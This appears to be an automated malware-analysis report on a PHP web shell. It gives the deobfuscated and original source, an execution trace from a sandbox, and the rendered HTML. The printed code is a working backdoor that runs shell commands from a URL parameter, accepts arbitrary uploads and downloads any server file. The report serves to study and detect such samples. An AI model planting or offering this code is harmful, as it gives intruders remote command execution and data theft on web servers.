webshell.php

md5: 83ca057e1aca4b64d4db97f1914a298a

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Execution
exec (Deobfuscated, Original)

Files
move_uploaded_file (Deobfuscated, Original)

Input
_FILES (Deobfuscated, Original)
_GET (Deobfuscated, Original)
_POST (Deobfuscated, Original)

URLs
http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css (Deobfuscated, HTML, Original)
http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js (Deobfuscated, HTML, Original)
https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file));
        readfile($file);
        exit;
    }
}
?>

<html>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<div class="container">


<?php 
function printPerms($file)
{
    $mode = fileperms($file);
    if ($mode & 0x1000) {
        $type = 'p';
    } else {
        if ($mode & 0x2000) {
            $type = 'c';
        } else {
            if ($mode & 0x4000) {
                $type = 'd';
            } else {
                if ($mode & 0x6000) {
                    $type = 'b';
                } else {
                    if ($mode & 0x8000) {
                        $type = '-';
                    } else {
                        if ($mode & 0xa000) {
                            $type = 'l';
                        } else {
                            if ($mode & 0xc000) {
                                $type = 's';
                            } else {
                                $type = 'u';
                            }
                        }
                    }
                }
            }
        }
    }
    $owner["read"] = $mode & 0400 ? 'r' : '-';
    $owner["write"] = $mode & 0200 ? 'w' : '-';
    $owner["execute"] = $mode & 0100 ? 'x' : '-';
    $group["read"] = $mode & 040 ? 'r' : '-';
    $group["write"] = $mode & 020 ? 'w' : '-';
    $group["execute"] = $mode & 010 ? 'x' : '-';
    $world["read"] = $mode & 04 ? 'r' : '-';
    $world["write"] = $mode & 02 ? 'w' : '-';
    $world["execute"] = $mode & 01 ? 'x' : '-';
    if ($mode & 0x800) {
        $owner["execute"] = $owner['execute'] == 'x' ? 's' : 'S';
    }
    if ($mode & 0x400) {
        $group["execute"] = $group['execute'] == 'x' ? 's' : 'S';
    }
    if ($mode & 0x200) {
        $world["execute"] = $world['execute'] == 'x' ? 't' : 'T';
    }
    $s = sprintf("%1s", $type);
    $s .= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
    $s .= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
    $s .= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
    return $s;
}
$dir = $_GET['dir'];
if (isset($_POST['dir'])) {
    $dir = $_POST['dir'];
}
$file = '';
if ($dir == NULL or !is_dir($dir)) {
    if (is_file($dir)) {
        echo "enters";
        $file = $dir;
        echo $file;
    }
    $dir = './';
}
$dir = realpath($dir . '/' . $value);
$dirs = scandir($dir);
echo "<h2>Viewing directory " . $dir . "</h2>";
echo "\n<br><form action='" . $_SERVER['PHP_SELF'] . "' method='GET'>";
echo "<input type='hidden' name='dir' value=" . $dir . " />";
echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
echo "</form>";
echo "\n<br>\n<div class='navbar-form'><form action='" . $_SERVER['PHP_SELF'] . "' method='POST' enctype='multipart/form-data'>\n";
echo "<input type='hidden' name='dir' value='" . $_GET['dir'] . "'/> ";
echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
echo "</div>";
if (isset($_POST['submit'])) {
    $uploadDirectory = $dir . '/' . basename($_FILES['fileToUpload']['name']);
    if (file_exists($uploadDirectory)) {
        echo "<br><br><b style='color:red'>Error. File already exists in " . $uploadDirectory . ".</b></br></br>";
    } else {
        if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
            echo '<br><br><b>File ' . $_FILES['fileToUpload']['name'] . ' uploaded successfully in ' . $dir . ' !</b><br>';
        } else {
            echo '<br><br><b style="color:red">Error uploading file ' . $uploadDirectory . '</b><br><br>';
        }
    }
}
if (isset($_GET['cmd'])) {
    echo "<br><br><b>Result of command execution: </b><br>";
    exec('cd ' . $dir . ' && ' . $_GET['cmd'], $cmdresult);
    foreach ($cmdresult as $key => $value) {
        echo "{$value} \n<br>";
    }
}
echo "<br>";
?>

<table class="table table-hover table-bordered">
    <thead>
      <tr>
        <th>Name</th>
        <th>Owner</th>
        <th>Permissions</th>
      </tr>
    </thead>
    <tbody>
<?php 
foreach ($dirs as $key => $value) {
    echo "<tr>";
    if (is_dir(realpath($dir . '/' . $value))) {
        echo "<td><a href='" . $_SERVER['PHP_SELF'] . "?dir=" . realpath($dir . '/' . $value) . "/'>" . $value . "</a></td><td>" . posix_getpwuid(fileowner($dir . '/' . $value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
    } else {
        echo "<td><a href='" . $_SERVER['PHP_SELF'] . "?download=" . realpath($dir . '/' . $value) . "'>" . $value . "</a></td><td>" . posix_getpwuid(fileowner($dir . '/' . $value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
    }
    echo "</tr>";
}
echo "</tbody>";
echo "</table>";
?>



</div>
</html>
Execution traces
data/traces/83ca057e1aca4b64d4db97f1914a298a_trace-1676244184.0626.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:23:29.960410]
1	0	1	0.000222	393528
1	3	0	0.000476	427504	{main}	1		/var/www/html/uploads/webshell.php	0	0
1		A						/var/www/html/uploads/webshell.php	65	$dir = NULL
1		A						/var/www/html/uploads/webshell.php	69	$file = ''
2	4	0	0.000546	427504	is_file	0		/var/www/html/uploads/webshell.php	71	1	NULL
2	4	1	0.000562	427544
2	4	R			FALSE
1		A						/var/www/html/uploads/webshell.php	76	$dir = './'
2	5	0	0.000593	427536	realpath	0		/var/www/html/uploads/webshell.php	78	1	'.//'
2	5	1	0.000609	427616
2	5	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/webshell.php	78	$dir = '/var/www/html/uploads'
2	6	0	0.000636	427552	scandir	0		/var/www/html/uploads/webshell.php	80	1	'/var/www/html/uploads'
2	6	1	0.000674	428176
2	6	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'webshell.php']
1		A						/var/www/html/uploads/webshell.php	80	$dirs = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'webshell.php']
1		A						/var/www/html/uploads/webshell.php	125	$key = 0
2	7	0	0.000735	428192	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/.'
2	7	1	0.000749	428272
2	7	R			'/var/www/html/uploads'
2	8	0	0.000764	428192	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads'
2	8	1	0.000780	428256
2	8	R			TRUE
2	9	0	0.000794	428280	realpath	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/.'
2	9	1	0.000807	428360
2	9	R			'/var/www/html/uploads'
2	10	0	0.000822	428328	fileowner	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/.'
2	10	1	0.000838	428368
2	10	R			0
2	11	0	0.000850	428280	posix_getpwuid	0		/var/www/html/uploads/webshell.php	128	1	0
2	11	1	0.000883	429080
2	11	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	12	0	0.000917	428296	printPerms	1		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads'
3	13	0	0.000931	428296	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	13	1	0.000946	428336
3	13	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	14	0	0.001081	429424	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	14	1	0.001097	429808
3	14	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	15	0	0.001121	429744	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	15	1	0.001136	430128
3	15	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	16	0	0.001161	429456	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	16	1	0.001175	429840
3	16	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	17	0	0.001198	429456	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	17	1	0.001213	429840
3	17	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	12	1	0.001235	428336
2	12	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 1
2	18	0	0.001260	428224	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/..'
2	18	1	0.001273	428296
2	18	R			'/var/www/html'
2	19	0	0.001287	428208	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html'
2	19	1	0.001301	428240
2	19	R			TRUE
2	20	0	0.001315	428280	realpath	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/..'
2	20	1	0.001335	428352
2	20	R			'/var/www/html'
2	21	0	0.001349	428312	fileowner	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/..'
2	21	1	0.001364	428368
2	21	R			0
2	22	0	0.001377	428272	posix_getpwuid	0		/var/www/html/uploads/webshell.php	128	1	0
2	22	1	0.001401	429072
2	22	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	23	0	0.001430	428288	printPerms	1		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads'
3	24	0	0.001443	428288	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	24	1	0.001458	428320
3	24	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	25	0	0.001587	429408	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	25	1	0.001601	429792
3	25	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	26	0	0.001624	429728	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	26	1	0.001639	430112
3	26	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	27	0	0.001661	429440	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	27	1	0.001676	429824
3	27	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	28	0	0.001698	429440	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	28	1	0.001712	429824
3	28	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	23	1	0.001733	428320
2	23	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 2
2	29	0	0.001758	428224	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/.htaccess'
2	29	1	0.001774	428312
2	29	R			'/var/www/html/uploads/.htaccess'
2	30	0	0.001789	428224	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/.htaccess'
2	30	1	0.001804	428272
2	30	R			FALSE
2	31	0	0.001817	428312	realpath	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/.htaccess'
2	31	1	0.001830	428400
2	31	R			'/var/www/html/uploads/.htaccess'
2	32	0	0.001845	428360	fileowner	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/.htaccess'
2	32	1	0.001858	428400
2	32	R			0
2	33	0	0.001870	428304	posix_getpwuid	0		/var/www/html/uploads/webshell.php	131	1	0
2	33	1	0.001892	429104
2	33	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	34	0	0.001921	428336	printPerms	1		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads'
3	35	0	0.001934	428336	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	35	1	0.001949	428368
3	35	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	36	0	0.002082	429456	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	36	1	0.002096	429840
3	36	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	37	0	0.002119	429776	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	37	1	0.002134	430160
3	37	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	38	0	0.002156	429488	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	38	1	0.002171	429872
3	38	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	39	0	0.002192	429488	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	39	1	0.002206	429872
3	39	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	34	1	0.002228	428368
2	34	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 3
2	40	0	0.002252	428224	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/data'
2	40	1	0.002268	428312
2	40	R			'/var/www/html/uploads/data'
2	41	0	0.002282	428224	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/data'
2	41	1	0.002297	428272
2	41	R			TRUE
2	42	0	0.002310	428296	realpath	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/data'
2	42	1	0.002323	428384
2	42	R			'/var/www/html/uploads/data'
2	43	0	0.002338	428344	fileowner	0		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads/data'
2	43	1	0.002351	428384
2	43	R			0
2	44	0	0.002363	428288	posix_getpwuid	0		/var/www/html/uploads/webshell.php	128	1	0
2	44	1	0.002386	429088
2	44	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	45	0	0.002415	428304	printPerms	1		/var/www/html/uploads/webshell.php	128	1	'/var/www/html/uploads'
3	46	0	0.002428	428304	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	46	1	0.002443	428336
3	46	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	47	0	0.002571	429424	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	47	1	0.002584	429808
3	47	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	48	0	0.002606	429744	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	48	1	0.002621	430128
3	48	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	49	0	0.002644	429456	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	49	1	0.002658	429840
3	49	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	50	0	0.002680	429456	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	50	1	0.002695	429840
3	50	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	45	1	0.002717	428336
2	45	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 4
2	51	0	0.002742	428232	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/prepend.php'
2	51	1	0.002756	428328
2	51	R			'/var/www/html/uploads/prepend.php'
2	52	0	0.002771	428232	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/prepend.php'
2	52	1	0.002786	428288
2	52	R			FALSE
2	53	0	0.002800	428328	realpath	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/prepend.php'
2	53	1	0.002813	428424
2	53	R			'/var/www/html/uploads/prepend.php'
2	54	0	0.002832	428376	fileowner	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/prepend.php'
2	54	1	0.002846	428416
2	54	R			0
2	55	0	0.002858	428312	posix_getpwuid	0		/var/www/html/uploads/webshell.php	131	1	0
2	55	1	0.002880	429112
2	55	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2	56	0	0.002909	428344	printPerms	1		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads'
3	57	0	0.002923	428344	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	57	1	0.002938	428368
3	57	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	58	0	0.003067	429456	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	58	1	0.003081	429840
3	58	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	59	0	0.003104	429776	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	59	1	0.003119	430160
3	59	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	60	0	0.003142	429488	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	60	1	0.003156	429872
3	60	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	61	0	0.003178	429488	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	61	1	0.003193	429872
3	61	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	56	1	0.003215	428368
2	56	R			'drwxrwxrwx'
1		A						/var/www/html/uploads/webshell.php	125	$key = 5
2	62	0	0.003239	428232	realpath	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/webshell.php'
2	62	1	0.003253	428328
2	62	R			'/var/www/html/uploads/webshell.php'
2	63	0	0.003267	428232	is_dir	0		/var/www/html/uploads/webshell.php	127	1	'/var/www/html/uploads/webshell.php'
2	63	1	0.003282	428288
2	63	R			FALSE
2	64	0	0.003296	428328	realpath	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/webshell.php'
2	64	1	0.003309	428424
2	64	R			'/var/www/html/uploads/webshell.php'
2	65	0	0.003324	428408	fileowner	0		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads/webshell.php'
2	65	1	0.003337	428448
2	65	R			1000
2	66	0	0.003349	428344	posix_getpwuid	0		/var/www/html/uploads/webshell.php	131	1	1000
2	66	1	0.003380	429160
2	66	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2	67	0	0.003410	428344	printPerms	1		/var/www/html/uploads/webshell.php	131	1	'/var/www/html/uploads'
3	68	0	0.003423	428344	fileperms	0		/var/www/html/uploads/webshell.php	36	1	'/var/www/html/uploads'
3	68	1	0.003438	428368
3	68	R			16895
2		A						/var/www/html/uploads/webshell.php	36	$mode = 16895
2		A						/var/www/html/uploads/webshell.php	39	$type = 'd'
2		A						/var/www/html/uploads/webshell.php	45	$owner['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	46	$owner['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	47	$owner['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	48	$group['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	49	$group['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	50	$group['execute'] = 'x'
2		A						/var/www/html/uploads/webshell.php	51	$world['read'] = 'r'
2		A						/var/www/html/uploads/webshell.php	52	$world['write'] = 'w'
2		A						/var/www/html/uploads/webshell.php	53	$world['execute'] = 'x'
3	69	0	0.003718	429456	sprintf	0		/var/www/html/uploads/webshell.php	57	2	'%1s'	'd'
3	69	1	0.003735	429840
3	69	R			'd'
2		A						/var/www/html/uploads/webshell.php	57	$s = 'd'
3	70	0	0.003759	429776	sprintf	0		/var/www/html/uploads/webshell.php	58	4	'%1s%1s%1s'	'r'	'w'	'x'
3	70	1	0.003774	430160
3	70	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	58	$s .= 'rwx'
3	71	0	0.003798	429488	sprintf	0		/var/www/html/uploads/webshell.php	59	4	'%1s%1s%1s'	'r'	'w'	'x'
3	71	1	0.003813	429872
3	71	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	59	$s .= 'rwx'
3	72	0	0.003835	429488	sprintf	0		/var/www/html/uploads/webshell.php	60	4	'%1s%1s%1s'	'r'	'w'	'x'
3	72	1	0.003850	429872
3	72	R			'rwx'
2		A						/var/www/html/uploads/webshell.php	60	$s .= 'rwx'
2	67	1	0.003873	428368
2	67	R			'drwxrwxrwx'
1	3	1	0.003888	428168
			0.003925	327400
TRACE END   [2023-02-12 21:23:29.964155]

Generated HTML code
<html><!-- Latest compiled and minified CSS --><head><link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

</head><body><div class="container">


<h2>Viewing directory /var/www/html</h2>
<br><form action="/webshell.php" method="GET"><input type="hidden" name="dir" value="/var/www/html"><input type="text" name="cmd" autocomplete="off" autofocus="">
<input type="submit" value="Execute">
</form>
<br>
<div class="navbar-form"><form action="/webshell.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dir" value=""> <input type="file" name="fileToUpload" id="fileToUpload">
<br><input type="submit" value="Upload File" name="submit"></form></div><br>
<table class="table table-hover table-bordered">
    <thead>
      <tr>
        <th>Name</th>
        <th>Owner</th>
        <th>Permissions</th>
      </tr>
    </thead>
    <tbody>
<tr><td><a href="/webshell.php?dir=/var/www/html/">.</a></td><td>root</td><td> drwxrwxrwx</td>
</tr><tr><td><a href="/webshell.php?dir=/var/www/">..</a></td><td>root</td><td> drwxrwxrwx</td>
</tr><tr><td><a href="/webshell.php?download=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a></td><td>root</td><td> drwxrwxrwx</td>
</tr><tr><td><a href="/webshell.php?download=/var/www/html/webshell.php">webshell.php</a></td><td>osboxes</td><td> drwxrwxrwx</td>
</tr></tbody></table>


</div>

</body></html>
Original PHP code
<?php

if (isset($_GET['download'])) {
	$file = $_GET['download'];
	if (file_exists($file)) {
	    header('Content-Description: File Transfer');
	    header('Content-Type: application/octet-stream');
	    header('Content-Disposition: attachment; filename="'.basename($file).'"');
	    header('Expires: 0');
	    header('Cache-Control: must-revalidate');
	    header('Pragma: public');
	    header('Content-Length: ' . filesize($file));
	    readfile($file);
	    exit;
	}
}

?>

<html>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<div class="container">


<?php

function printPerms($file) {
	$mode = fileperms($file);
	if( $mode & 0x1000 ) { $type='p'; }
	else if( $mode & 0x2000 ) { $type='c'; }
	else if( $mode & 0x4000 ) { $type='d'; }
	else if( $mode & 0x6000 ) { $type='b'; }
	else if( $mode & 0x8000 ) { $type='-'; }
	else if( $mode & 0xA000 ) { $type='l'; }
	else if( $mode & 0xC000 ) { $type='s'; }
	else $type='u';
	$owner["read"] = ($mode & 00400) ? 'r' : '-';
	$owner["write"] = ($mode & 00200) ? 'w' : '-';
	$owner["execute"] = ($mode & 00100) ? 'x' : '-';
	$group["read"] = ($mode & 00040) ? 'r' : '-';
	$group["write"] = ($mode & 00020) ? 'w' : '-';
	$group["execute"] = ($mode & 00010) ? 'x' : '-';
	$world["read"] = ($mode & 00004) ? 'r' : '-';
	$world["write"] = ($mode & 00002) ? 'w' : '-';
	$world["execute"] = ($mode & 00001) ? 'x' : '-';
	if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
	if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
	if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
	$s=sprintf("%1s", $type);
	$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
	$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
	$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
	return $s;
}


$dir = $_GET['dir'];
if (isset($_POST['dir'])) {
	$dir = $_POST['dir'];
}
$file = '';
if ($dir == NULL or !is_dir($dir)) {
